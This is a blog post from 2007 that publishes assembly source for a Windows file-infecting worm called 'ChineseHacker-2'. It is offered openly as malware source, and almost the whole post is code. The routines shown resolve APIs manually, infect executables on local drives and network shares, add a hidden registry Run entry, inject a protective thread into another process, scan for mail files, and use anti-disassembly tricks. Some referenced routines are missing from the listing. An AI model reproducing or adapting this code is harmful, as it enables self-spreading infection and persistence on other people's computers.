ChineseHacker2中国黑客2源代码

2007-03-10 21:24:54

~
include wap32.inc

ApiAddressList struc
;Kernel32.DLL
KnlLoadLibraryA dd ?
KnlCreateMutexA dd ?
KnlGetLastError dd ?
KnlGetCommandLineA dd ?
KnlWinExec dd ?
KnlGetDriveTypeA dd ?
KnlSetCurrentDirectoryA dd ?
KnlFindFirstFileA dd ?
KnlFindNextFileA dd ?
KnlFindClose dd ?
KnlSetFileAttributesA dd ?
KnlSetFileTime dd ?
KnlLOpen dd ?
KnlLRead dd ?
KnlLWrite dd ?
KnlLSeek dd ?
KnlLClose dd ?
KnlSleep dd ?
KnlRegisterServiceProc dd ?
KnlGetCurrentProcessId dd ?
KnlOpenProcess dd ?
KnlWriteProcessMemory dd ?
KnlCreateRemoteThread dd ?
KnlCreateKernelThread dd ?
KnlCloseHandle dd ?
KnlWaitForSingleObject dd ?
KnlVirtualAllocEx dd ?
KnlGetSystemDirectoryA dd ?
KnlLCreat dd ?
KnlCreateThread dd ?
KnlTerminateThread dd ?
KnlWideCharToMultiByte dd ?
KnlGetComputerNameA dd ?
KnlGetSystemTime dd ?
;User32.DLL
UserGetWinThreadProcId dd ?
UserFindWindowA dd ?
UserMessageBoxA dd ?
UserGetWindow dd ?
UserSendMessageA dd ?
UserwsprintfA dd ?
;AdvApi32.DLL
AdvRegOpenKeyA dd ?
AdvRegSetValueExA dd ?
AdvRegQueryValueExA dd ?
AdvRegNotifyChange dd ?
;Mpr.DLL
MprWNetOpenEnumA dd ?
MprWNetEnumResourceA dd ?
MprWNetCloseEnum dd ?
;WSock32.DLL
WsWSAStartup dd ?
WsWSACleanup dd ?
Wssend dd ?
Wshtons dd ?
Wsgethostbyname dd ?
Wsconnect dd ?
Wssocket dd ?
Wsclosesocket dd ?
Wsrecv dd ?
;VirusData
DataKnlMzHeader dd ?
DataVirusSize dd ?
DataRemoteThread dd ?

ApiAddressList ends

MAX_BUFF_SIZE=1000h
VirusSize=offset VirusEnd-offset Start+10h

extrn MessageBoxA: proc
extrn ExitProcess: proc

.586p
.model flat,stdcall

.data

Start:
pushad
call VirusEnd
NeedDecode:
mov esi,[esp+4*8]
call PushRunError ;得到意外继续执行地址
popad
PushXXXCode db 68h ;JmpOldApp
OldEntryRVA dd offset Exit
ret
db 0e9h ;静态反汇编干扰

PushRunError:
pop ecx
call SetSehFrame
FindKernel32:
and esi,0fffff000h ;得到Kernel.PELoader代码位置(不精确)
LoopFindKernel32:
sub esi,1000h
cmp word ptr[esi],'ZM' ;搜索EXE文件头
jnz short LoopFindKernel32
GetPeHeader:
movzx edi,word ptr[esi.PEHeaderOffset]
add edi,esi
mov ebp,[edi.fhExportsRVA]
add ebp,esi ;得到输出函数表
mov ebx,[ebp.etExportNameList]
add ebx,esi ;得到输出函数名表
xor eax,eax ;函数序号计数
mov edx,esi ;暂存Kernel32模块句柄
LoopFindApiStr:
add ebx,04
inc eax ;增加函数计数
mov edi,[ebx]
add edi,edx ;得到一个Api函数名字符串
call PushStrGetProcAddress
db 'GetProcAddress',0
PushStrGetProcAddress:
pop esi ;得到Api名字字符串
xor ecx,ecx
mov cl,15 ;GetProcAddress串大小
cld
rep cmpsb
jnz short LoopFindApiStr
mov esi,edx
mov ebx,[ebp.etExportOrdlList]
add ebx,esi ;取函数序号地址列表
movzx ecx,word ptr[ebx+eax*2]
mov ebx,[ebp.etExportAddrList]
add ebx,esi ;得到Kernel32函数地址列表
mov ebx,[ebx+ecx*4]
add ebx,esi ;计算GetProcAddress函数地址

sub esp,size ApiAddressList+10h ;在堆栈中存放API的地址
mov edi,esp

mov [esp.DataKnlMzHeader],esi

call PushKnlApiStr
LoopRelocKnlApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位Kernel32.dll Api
loop LoopRelocKnlApi

mov eax,[esp.KnlLoadLibraryA]
call PushUser32Str
db 'USER32.DLL',0
PushUser32Str:
call eax
mov esi,eax
call PushUser32ApiStr
LoopRelocUser32Api:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位User32.dll Api
loop LoopRelocUser32Api

mov eax,[esp.KnlLoadLibraryA]
call PushAdvApi32Str
db 'ADVAPI32.DLL',0
PushAdvApi32Str:
call eax
mov esi,eax
call PushAdvApiStr
LoopRelocAdvApi32Api:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位ADVAPI32.dll Api
loop LoopRelocAdvApi32Api

mov eax,[esp.KnlLoadLibraryA]
call PushMprStr
db 'MPR.DLL',0
PushMprStr:
call eax
mov esi,eax
call PushMprApiStr
LoopRelocMprApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位MPR.dll Api
loop LoopRelocMprApi

mov eax,[esp.KnlLoadLibraryA]
call PushWsStr
db 'WSOCK32.DLL',0
PushWsStr:
call eax
mov esi,eax
call PushWsApiStr
LoopRelocWsApi:
mov ebp,ecx
call ebx,esi
cld
stosd
mov ecx,ebp ;定位MPR.dll Api
loop LoopRelocWsApi

mov esi,esp ;函数调用列表指针,以后固定不变

call PushMutexName
db 'ChineseHacker-2',0
PushMutexName:
call [esi.KnlCreateMutexA],0,0
call [esi.KnlGetLastError]
or eax,eax ;检查病毒是否已经运行
jz short ExecOldProgram
int 3; ;人工引发异常执行原程序,JmpOldApp
db 0e9h ;静态反汇编干扰

ExecOldProgram: ;加载自己，运行老程序
call [esi.KnlGetCommandLineA]
call [esi.KnlWinExec],eax,L 01

call PushNextRunErrorProc;保护注册表与创建远程线程
mov esi,esp ;意外继续执行地址
StartScan:
call PushScanErrorProc;搜索本地与远程目录文件
mov esi,esp ;恢复函数调用列表指针
call [esi.KnlSleep],1000*60;*10
jmp short StartScan ;休眠10分钟重新搜索文件
db 0e9h ;静态反汇编干扰
PushScanErrorProc:
pop ecx
call SetSehFrame

ScanExeFile:
call GetFoundFileCallBackAddr
lea eax,[edx+offset OptExeFile-offset FoundFileCallBackAddr]
mov [edx],eax ;设置找到文件的处理程序

call GetFoundDirCallBackAddr
lea eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
mov [edx],eax ;设置找到目录的处理程序

call EnumLogDrive ;搜索本地文件，并传染病毒

call GetFoundDirCallBackAddr
lea eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
mov [edx],eax ;设置找到NET目录的处理程序

call EnumNetResource ;搜索远程文件，并传染病毒

ScanMailFile:
call GetFoundFileCallBackAddr
lea eax,[edx+offset OptMailFile-offset FoundFileCallBackAddr]
mov [edx],eax ;设置找到文件的处理程序

call GetFoundDirCallBackAddr
lea eax,[edx+offset OptLocalDir-offset FoundDirCallBackAddr]
mov [edx],eax ;设置找到目录的处理程序
call EnumLogDrive ;搜索本地文件，发邮件

call GetFoundDirCallBackAddr
lea eax,[edx+offset OptNetDir-offset FoundDirCallBackAddr]
mov [edx],eax ;设置找到NET目录的处理程序

call EnumNetResource ;搜索远程文件，发邮件

CheckRemoteAndWait:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60;
cmp eax,-1 ;睡眠8小时
jnz short AddWordToQQMsg
NeedCreateRemote:
push esi
call PushWaitErrorProc
pop esi
call GetNetSendMsg
db 'Net Send * My god! Some one killed ChineseHacker-2 Monitor',0
GetNetSendMsg:
pop eax
call [esi.KnlWinExec],eax,0
jmp short CheckRemoteAndWait
PushWaitErrorProc:
pop ecx
call SetSehFrame

call ProcessProtect ;重新启动远程线程保护/内带意外
db 0e9h ;静态反汇编干扰

AddWordToQQMsg:
call GetVirusBaseInRegEdi
GetVirusBaseInRegEdi:
pop edi

mov eax,[esi.UserFindWindowA];填写线程用API
mov [edi+offset FindWindowA9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.UserGetWindow]
mov [edi+offset GetWindow9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.UserSendMessageA]
mov [edi+offset SendMessageA9x2k-offset GetVirusBaseInRegEdi],eax
mov eax,[esi.KnlSleep]
mov [edi+offset Sleep9x2k-offset GetVirusBaseInRegEdi],eax

lea eax,[edi+offset SendQQMsg-offset GetVirusBaseInRegEdi]
push eax ;创建QQ附加消息线程
call [esi.KnlCreateThread],0,0,eax,eax,0,esp
mov ebx,eax ;保证SendQQMsg线程活动10分钟
pop eax

CheckRemoteAndWaitAgain:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60;
push eax ;睡眠10分钟
call [esi.KnlTerminateThread],ebx,0
pop eax
cmp eax,-1
jz short NeedCreateRemoteAgain
int 3; ;人工意外，继续搜索文件
db 0e9h ;静态反汇编干扰
NeedCreateRemoteAgain:
push esi
call PushWaitErrorProcAgain
pop esi
jmp short CheckRemoteAndWaitAgain
PushWaitErrorProcAgain:
pop ecx
call SetSehFrame

call ProcessProtect ;重新启动远程线程保护/内带意外
db 0e9h ;静态反汇编干扰

PushNextRunErrorProc: ;保护注册表与创建远程线程
pop ecx
call SetSehFrame

RegisterProtect:
sub esp,100h ;构造病毒路径
call BuildVirusPathInStack,esp
mov edi,esp

call [esi.KnlLCreat],edi,10h
cmp eax,-1h ;创建独占文件
jz short OptRegister
mov ebx,eax
call UnzipVirusToFile;解压PE文件
call [esi.KnlLSeek],ebx,0,0
call FixPeFile,ebx ;传染病毒给PE文件,不关闭文件，防删除
mov edi,esp ;把病毒设置为：隐藏+系统+只读
call [esi.KnlSetFileAttributesA],edi,7h

OptRegister:
push eax
push esp
call PushRegKeyStr
db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
PushRegKeyStr:
call [esi.AdvRegOpenKeyA],080000002h
pop ebx
mov eax,esp
call PushKeyNameStr ;修改注册表，自动Run项目
db 'Runonce',0
PushKeyNameStr:
pop ecx
call [esi.AdvRegSetValueExA],ebx,ecx,0,1,eax,100h

call GetVirusBaseInEdi
GetVirusBaseInEdi:
pop edi ;得到病毒位置参照偏移量

mov eax,[esi.AdvRegQueryValueExA];填写API地址
mov [edi+offset AdvRegQueryValueExA9x2k-offset GetVirusBaseInEdi],eax
mov eax,[esi.AdvRegSetValueExA]
mov [edi+offset AdvRegSetValueExA9x2k-offset GetVirusBaseInEdi],eax
mov eax,[esi.AdvRegNotifyChange]
mov [edi+offset AdvRegNotifyChangeKeyValue9x2k-offset GetVirusBaseInEdi],eax

lea eax,[edi+offset RegisterProtectProc-offset GetVirusBaseInEdi]
push eax ;创建注册表监视线程
call [esi.KnlCreateThread],0,0,eax,ebx,0,esp
pop eax ;不关闭注册表句柄，监视线程续用

ProcessProtect: ;创建远程线程
xor eax,eax
mov [esi.DataRemoteThread],eax

sub esp,100h
call BuildVirusPathInStack,esp

call GetVirusBaseInEdiAgain
GetVirusBaseInEdiAgain:
pop edi ;得到病毒位置参照偏移量

mov eax,[esi.KnlOpenProcess];填写API地址
mov [edi+offset KnlOpenProcess9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlWaitForSingleObject]
mov [edi+offset KnlWaitForSingleObject9x2k-offset GetVirusBaseInEdiAgain],eax
mov eax,[esi.KnlWinExec]
mov [edi+offset KnlWinExec9x2k-offset GetVirusBaseInEdiAgain],eax

mov eax,[esi.KnlRegisterServiceProc]
or eax,eax ;依靠函数RehSvrProc来假定操作系统类别9x/2k
jz short Process2kProtect

Process9xProtect:
call eax,L 0,L 1 ;在Win9x下先隐藏本进程，一级保护

mov edx,[esi.DataKnlMzHeader]
movzx ebx,word ptr[edx.PEHeaderOffset]
add ebx,edx
mov ecx,[ebx.fhObjectTable00.otRVA]
mov ebp,[ebx.fhHeaderSize]
sub ecx,ebp
cmp ecx,200h
jb short Process9xProtectEnd
add ebp,edx ;查询Knl空间

lea edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
call MoveDataToKnl,edx,ebp,ProcessProtectProcSize
lea ecx,[ebp+ProcessProtectProcSize]
mov edx,esp ;复制线程代码数据到Kernel32.dll
call MoveDataToKnl,edx,ecx,100h

call [esi.KnlGetCurrentProcessId]
push eax ;创建Kernel线程，未公开函数
call [esi.KnlCreateKernelThread],0,0,ebp,eax,0,esp
mov [esi.DataRemoteThread],eax
pop eax ;启动进程保护线程

call [esi.KnlSleep],500

Process9xProtectEnd:
int 3 ;人工异常
db 0e9h ;反汇编干扰

Process2kProtect: ;填写API地址
call [esi.UserFindWindowA],0,0
push eax ;找Explorer进程/或者Top窗口程序
call [esi.UserGetWinThreadProcId],eax,esp
call [esi.KnlOpenProcess],PROCESS_ALL_ACCESS,0
or eax,eax ;打开该进程
jz short Process2kProtectEnd
mov ebx,eax
call [esi.KnlVirtualAllocEx],ebx,NULL,200h,MEM_COMMIT,L 40h
or eax,eax
jz short Close2kHandle
mov ebp,eax ;分配远程空间

lea edx,[edi+offset ProcessProtectProc-offset GetVirusBaseInEdiAgain]
push eax
call [esi.KnlWriteProcessMemory],ebx,ebp,edx,ProcessProtectProcSize,esp
pop eax ;复制代码到远程地址空间
cmp eax,ProcessProtectProcSize
jnz short Close2kHandle

mov edx,esp
lea ecx,[ebp+ProcessProtectProcSize]
push eax
call [esi.KnlWriteProcessMemory],ebx,ecx,edx,100h,esp
call [esi.KnlGetCurrentProcessId]
call [esi.KnlCreateRemoteThread],ebx,NULL,NULL,ebp,eax,NULL,esp
mov [esi.DataRemoteThread],eax
pop eax ;启动进程保护线程

Close2kHandle:
call [esi.KnlCloseHandle],ebx
call [esi.KnlSleep],500

Process2kProtectEnd:
int 3 ;人工异常
db 0e9h ;反汇编干扰

PushKnlApiStr: ;:ecx=函数名个数
pop eax ;弹出返回地址
mov ecx,esp
call PushKnlApiStr33
db 'GetSystemTime',0
PushKnlApiStr33:
call PushKnlApiStr32
db 'GetComputerNameA',0
PushKnlApiStr32:
call PushKnlApiStr31
db 'WideCharToMultiByte',0
PushKnlApiStr31:
call PushKnlApiStr30
db 'TerminateThread',0
PushKnlApiStr30:
call PushKnlApiStr29
db 'CreateThread',0
PushKnlApiStr29:
call PushKnlApiStr28
db '_lcreat',0
PushKnlApiStr28:
call PushKnlApiStr27
db 'GetSystemDirectoryA',0
PushKnlApiStr27:
call PushKnlApiStr26
db 'VirtualAllocEx',0
PushKnlApiStr26:
call PushKnlApiStr25
db 'WaitForSingleObject',0
PushKnlApiStr25:
call PushKnlApiStr24
db 'CloseHandle',0
PushKnlApiStr24:
call PushKnlApiStr23
db 'CreateKernelThread',0
PushKnlApiStr23:
call PushKnlApiStr22
db 'CreateRemoteThread',0
PushKnlApiStr22:
call PushKnlApiStr21
db 'WriteProcessMemory',0
PushKnlApiStr21:

call PushKnlApiStr20
db 'OpenProcess',0
PushKnlApiStr20:
call PushKnlApiStr19
db 'GetCurrentProcessId',0
PushKnlApiStr19:
call PushKnlApiStr18
db 'RegisterServiceProcess',0
PushKnlApiStr18:
call PushKnlApiStr17
db 'Sleep',0
PushKnlApiStr17:
call PushKnlApiStr16
db '_lclose',0
PushKnlApiStr16:
call PushKnlApiStr15
db '_llseek',0
PushKnlApiStr15:
call PushKnlApiStr14
db '_lwrite',0
PushKnlApiStr14:
call PushKnlApiStr13
db '_lread',0
PushKnlApiStr13:
call PushKnlApiStr12
db '_lopen',0
PushKnlApiStr12:
call PushKnlApiStr11
db 'SetFileTime',0
PushKnlApiStr11:
call PushKnlApiStr10
db 'SetFileAttributesA',0
PushKnlApiStr10:
call PushKnlApiStr09
db 'FindClose',0
PushKnlApiStr09:
call PushKnlApiStr08
db 'FindNextFileA',0
PushKnlApiStr08:
call PushKnlApiStr07
db 'FindFirstFileA',0
PushKnlApiStr07:
call PushKnlApiStr06
db 'SetCurrentDirectoryA',0
PushKnlApiStr06:
call PushKnlApiStr05
db 'GetDriveTypeA',0
PushKnlApiStr05:
call PushKnlApiStr04
db 'WinExec',0
PushKnlApiStr04:
call PushKnlApiStr03
db 'GetCommandLineA',0
PushKnlApiStr03:
call PushKnlApiStr02
db 'GetLastError',0
PushKnlApiStr02:
call PushKnlApiStr01
db 'CreateMutexA',0
PushKnlApiStr01:
call PushKnlApiStr00
db 'LoadLibraryA',0
PushKnlApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰

PushUser32ApiStr:
pop eax
mov ecx,esp
call PushUser32ApiStr05
db 'wsprintfA',0
PushUser32ApiStr05:
call PushUser32ApiStr04
db 'SendMessageA',0
PushUser32ApiStr04:
call PushUser32ApiStr03
db 'GetWindow',0
PushUser32ApiStr03:
call PushUser32ApiStr02
db 'MessageBoxA',0
PushUser32ApiStr02:
call PushUser32ApiStr01
db 'FindWindowA',0
PushUser32ApiStr01:
call PushUser32ApiStr00
db 'GetWindowThreadProcessId',0
PushUser32ApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushAdvApiStr:
pop eax
mov ecx,esp
call PushAdvApi03
db 'RegNotifyChangeKeyValue',0
PushAdvApi03:
call PushAdvApi02
db 'RegQueryValueExA',0
PushAdvApi02:
call PushAdvApi01
db 'RegSetValueExA',0
PushAdvApi01:
call PushAdvApi00
db 'RegOpenKeyA',0
PushAdvApi00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰

PushMprApiStr:
pop eax
mov ecx,esp
call PushMprAPiStr02
db 'WNetCloseEnum',0
PushMprAPiStr02:
call PushMprApiStr01
db 'WNetEnumResourceA',0
PushMprApiStr01:
call PushMprApiStr00
db 'WNetOpenEnumA',0
PushMprApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰

PushWsApiStr:
pop eax
mov ecx,esp
call PushWsApiStr08
db 'recv',0
PushWsApiStr08:
call PushWsApiStr07
db 'closesocket',0
PushWsApiStr07:
call PushWsApiStr06
db 'socket',0
PushWsApiStr06:
call PushWsApiStr05
db 'connect',0
PushWsApiStr05:
call PushWsApiStr04
db 'gethostbyname',0
PushWsApiStr04:
call PushWsApiStr03
db 'htons',0
PushWsApiStr03:
call PushWsApiStr02
db 'send',0
PushWsApiStr02:
call PushWsApiStr01
db 'WSACleanup',0
PushWsApiStr01:
call PushWsApiStr00
db 'WSAStartup',0
PushWsApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰

PushQQMsg:
pop eax
mov ecx,esp
call PushQQMsg00
db '枪毙李洪志!',0
PushQQMsg00:
call PushQQMsg01
db '去他mdFLG!',0
PushQQMsg01:
call PushQQMsg02
db '反对邪教,崇尚科学!',0
PushQQMsg02:
call PushQQMsg03
db '打倒本拉登!',0
PushQQMsg03:
call PushQQMsg04
db '向英雄王伟致意!',0
PushQQMsg04:
call PushQQMsg05
db '反对霸权主义!',0
PushQQMsg05:
call PushQQMsg06
db '世界需要和平!',0
PushQQMsg06:
call PushQQMsg07
db '社会主义好!',0
PushQQMsg07:
sub ecx,esp
jmp eax
db 0e9h ;静态反汇编干扰

BuildVirusPathInStack proc Stack: dword
pushad
mov edi,Stack
call [esi.KnlGetSystemDirectoryA],edi,100h
add edi,eax
call GetVirusFileName
db '\runouce.exe',0
GetVirusFileName:
pop esi
mov ecx,16
cld
rep movsb ;合成病毒路径名
popad
ret
BuildVirusPathInStack endp
db 0e9h ;静态反汇编干扰

EnumLogDrive proc
;列举本地逻辑磁盘文件
mov ecx,24
mov edx,'\:C'
ContEnumLogDrive:
push ecx
push edx
call [esi.KnlGetDriveTypeA],esp
cmp eax,2 ;是不可访问磁盘
jb short ContNextLogDrive
cmp eax,5 ;是CDROM光盘
jz short ContNextLogDrive
call EnumFileObject,esp
ContNextLogDrive:
pop edx
inc edx
pop ecx
loop short ContEnumLogDrive
ret
EnumLogDrive endp
db 0e9h ;静态反汇编干扰

EnumNetResource proc
;列举网络资源
xor edi,edi ;edi: NetData
call PushEnumNetWorkGroup
call PushEnumNetComputer
call PushEnumNetComputerShareDir
call PushEnumNetFile
mov eax,[edi.lpRemoteName]
call EnumFileObject,eax;列举计算机共享目录里的文件
ret
db 0e9h ;静态反汇编干扰
PushEnumNetFile: ;列举计算机共享目录
call EnumNetObject,RESOURCEUSAGE_CONNECTABLE,edi
ret
db 0e9h ;静态反汇编干扰
PushEnumNetComputerShareDir: ;列举计算机
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;静态反汇编干扰
PushEnumNetComputer: ;列举工作组
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;静态反汇编干扰
PushEnumNetWorkGroup: ;列举网络根
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;静态反汇编干扰
EnumNetResource endp

EnumNetObject proc Flag:dword,NetData:dword,CallBack:dword
;用来列举局域网某种对象
pushad
push eax
call [esi.MprWNetOpenEnumA],RESOURCE_GLOBALNET,RESOURCETYPE_DISK,Flag,NetData,esp
pop ebx ;弹出hEnum句柄,平衡堆栈
or eax,eax
jnz short EnumNetObjectError
sub esp,MAX_BUFF_SIZE;划分堆栈空间大小
LoopEnumNetObject:
mov edx,esp
push L 1h ;一次列举一个
mov eax,esp
push MAX_BUFF_SIZE ;缓冲区大小
call [esi.MprWNetEnumResourceA],ebx,eax,edx,esp
pop ecx
pop ecx ;平衡堆栈
or eax,eax
jnz short EnumNetObjectOver
mov edi,esp
call CallBack ;调用回调函数,利用edi,传递参数
jmp short LoopEnumNetObject
db 0e9h ;静态反汇编干扰
EnumNetObjectOver:
call [esi.MprWNetCloseEnum],ebx
add esp,MAX_BUFF_SIZE
EnumNetObjectError:
popad
ret
EnumNetObject endp
db 0e9h ;静态反汇编干扰

EnumFileObject proc BootDir:dword
;用来列举目录/网络上某个共享目录
pushad
mov eax,BootDir
mov eax,[eax]
or eax,20202020h
cmp eax,'nniw' ;不感染WINN...目录
jz short SetDirError
cmp eax,'dniw' ;不感染WIND...目录
jz short SetDirError
call [esi.KnlSetCurrentDirectoryA],BootDir ;设为当前目录
or eax,eax
jz short SetDirError
call FoundDirObject,BootDir
sub esp,MAX_BUFF_SIZE;1000h字节的缓冲区
mov [esp],L 2a2e2ah ;建立"*.*"字符串
mov eax,esp
call [esi.KnlFindFirstFileA],eax,esp
mov ebx,eax
cmp eax,-1
jz short EnumFileObjectError
LoopEnumFileObject:
call [esi.KnlFindNextFileA],ebx,esp
or eax,eax
jz short EnumFileObjectOver
lea edx,[esp.cFileName]
mov eax,[esp.dwFileAttributes]
and eax,10h ;测试文件属性
jz short IsFileObject
IsDirObject: ;是一个目录
mov eax,[edx]
cmp al,'.' ;测试是否点目录,是就不处理
jz short LoopEnumFileObject
call EnumFileObject,edx;递归调用
jmp short LoopEnumFileObject
db 0e9h ;静态反汇编干扰
IsFileObject: ;是一个文件
call FoundFileObject,esp;操作文件
jmp short LoopEnumFileObject
db 0e9h ;静态反汇编干扰
EnumFileObjectOver:
call [esi.KnlFindClose],ebx
EnumFileObjectError:
mov dword ptr[esp],L 2e2eh ;恢复原来的当前目录建立字符串".."
call [esi.KnlSetCurrentDirectoryA],esp
add esp,MAX_BUFF_SIZE;平衡堆栈
SetDirError:
popad
ret
EnumFileObject endp
db 0e9h ;静态反汇编干扰

FoundDirObject proc DirName: dword
pushad
call PushOptDirError
popad
ret
db 0e9h ;静态反汇编干扰
PushOptDirError:
pop ecx ;意外忽略设置
call SetSehFrame
call GetFoundDirCallBackAddr
call [edx],DirName
int 3 ;人工意外
FoundDirObject endp
db 0e9h ;静

FoundFileObject proc FindData:dword
pushad
call PushOptFileError
popad
ret
db 0e9h ;静态反汇编干扰

PushOptFileError:
pop ecx ;意外忽略设置
call SetSehFrame
call GetFoundFileCallBackAddr
call [edx],FindData
int 3 ;人工意外
FoundFileObject endp
db 0e9h ;静态反汇编干扰

GetFoundDirCallBackAddr:
call PushFoundDirCallBackAddr
FoundDirCallBackAddr dd ?
PushFoundDirCallBackAddr:
pop edx
ret
db 0e9h ;静态反汇编干扰

GetFoundFileCallBackAddr:
call PushFoundFileCallBackAddr
FoundFileCallBackAddr dd ?
PushFoundFileCallBackAddr:
pop edx
ret
db 0e9h ;静态反汇编干扰

GetFileExtName proc FileName: dword
mov eax,FileName
ContIncEax:
inc eax
cmp byte ptr[eax],0
jnz short ContIncEax
mov eax,[eax-4]
or eax,20202020h
ret
GetFileExtName endp
db 0e9h ;静态反汇编干扰

OptLocalDir proc DirName: dword
call [esi.KnlSleep],10;消除CPU时间占有异常
ret
OptLocalDir endp
db 0e9h ;静态反汇编干扰

上一篇 Happy Valentine's Day!　　下一篇入侵日本某官方Game

类别：H4c|< ┆ 技术圈() ┆ 阅读() ┆ 评论() ┆推送到技术圈 ┆返回首页

相关文章

文章评论

昵称：
验证码：		点击图片可刷新验证码　　博客过2级，无需填写验证码
内容：

virus

ChineseHacker2中国黑客2源代码